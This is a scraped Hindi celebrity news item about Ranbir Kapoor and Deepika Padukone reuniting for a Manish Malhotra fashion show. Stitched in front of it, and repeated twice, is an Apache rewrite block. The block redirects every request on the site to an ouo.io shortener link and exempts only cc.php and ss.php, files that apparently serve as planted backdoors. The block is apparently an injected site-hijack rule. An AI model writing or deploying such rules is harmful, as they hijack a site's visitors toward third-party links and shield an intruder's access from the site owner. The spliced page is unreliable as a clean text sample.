
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 465
Previous Nextमुंबई। रणबीर कपूर और दीपिका पादुकोण एक बार फिर साथ-साथ नजर आने वाले हैं। आपको बता दें कि इस चर्चित जोड़ी ने कई फिल्मों में साथ काम किया है। अलग होने के बाद दोनों फिल्म फिल्म 'तमाशा' में नजर आये थे। खबरें हैं कि अब 3 साल बाद एकबार फिर दोनों साथ नजर आनेवाले हैं।
रणबीर और दीपिका किसी फिल्म में नहीं बल्कि एक फैशन शो के लिए साथ नजर आनेवाले हैं। खबरें हैं कि दोनों ने जानेमाने फैशन डिजायनर मनीष मल्होत्रा के फैशन शो का हिस्सा बनने के लिए हामी भर दी है। दोनों मनीष मल्होत्रा के कलेक्शन के लिए रैंपवॉक करेंगे। 9 अप्रैल को होनेवाले मिज़वान फैशन वीक में रणबीर और दीपिका एकदूसरे का हाथ थामे रैंपवॉक करते नजर आयेंगे। बताया जा रहा है कि शो के लिए दोनों स्टार्स तैयारियों में जुट गये हैं। एक समय रणबीर और दीपिका एकदूसरे के करीब हुआ करते थे। बाद में दोनों का ब्रेकअप हो गया। रणबीर और दीपिका के अलगाव के बाद रणबीर की जिंदगी में कैटरीना कैफ आ गईं और दीपिका की जिंदगी में रणवीर सिंह की इंट्री हुई। रणबीर और कैटरीना की राहें अलग हो चुकी हैं। हालांकि दीपिका और रणबीर को लेकर खबरें आ रही है कि दोनों इस साल के अंत तक शादी के बंधन में बंध सकते हैं।